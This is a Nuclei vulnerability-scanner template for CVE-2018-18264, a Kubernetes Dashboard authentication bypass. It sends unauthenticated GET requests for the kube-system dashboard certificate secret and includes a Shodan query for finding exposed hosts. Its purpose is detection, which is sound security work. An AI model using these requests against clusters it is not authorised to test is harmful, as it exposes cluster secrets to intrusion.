nuclei-templates/cves/2018/CVE-2018-18264.yaml

41 lines
1.3 KiB
YAML

id: CVE-2018-18264
info:
name: Kubernetes Dashboard <1.10.1 - Authentication Bypass
author: edoardottt
severity: high
description: |
Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster.
reference:
- https://github.com/kubernetes/dashboard/pull/3289
- https://sysdig.com/blog/privilege-escalation-kubernetes-dashboard/
- https://groups.google.com/forum/#!topic/kubernetes-announce/yBrFf5nmvfI
- https://nvd.nist.gov/vuln/detail/CVE-2018-18264
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-18264
cwe-id: CWE-306
metadata:
shodan-query: product:"Kubernetes"
tags: cve,cve2018,kubernetes,k8s,auth-bypass
requests:
- method: GET
path:
- "{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"
- "{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body, "apiVersion") && contains(body, "objectRef")'
- type: status
status:
- 200
# Enhanced by mp on 2022/06/13